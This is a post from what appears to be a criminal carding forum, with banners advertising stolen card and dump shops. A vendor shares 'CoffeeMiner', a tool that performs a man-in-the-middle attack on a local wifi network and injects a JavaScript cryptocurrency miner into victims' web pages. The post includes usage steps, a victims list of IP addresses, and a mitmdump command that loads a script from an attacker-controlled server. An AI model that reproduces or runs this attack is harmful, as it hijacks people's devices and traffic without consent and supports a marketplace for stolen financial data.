Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
adv ex on 5 january 2024
adv ex on 22 February 2024
BidenCash Shop
Kfc Club

Patrick Stash
casino
banner expire at 13 August 2024
banner Expire 26 October 2024
Rescator cvv and dump shop
Yale lodge shop
UniCvv
banner Expire 1 April  2021

ALBERT

TRUSTED VENDOR
Staff member
Joined
Dec 3, 2020
Messages
1,572
i decided to share this little awesome tool that uses mitm attack to inject a JS miner in wifi network. Hope you will like, Enjoy!


Concept:

  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner
Use:
  • install.sh
Code:
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
Code:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • execute coffeeMiner.py
Code:
python3 coffeeMiner.py ipgateway

Scenario:
coffeeMiner-demo-cutted.gif
 
Top Bottom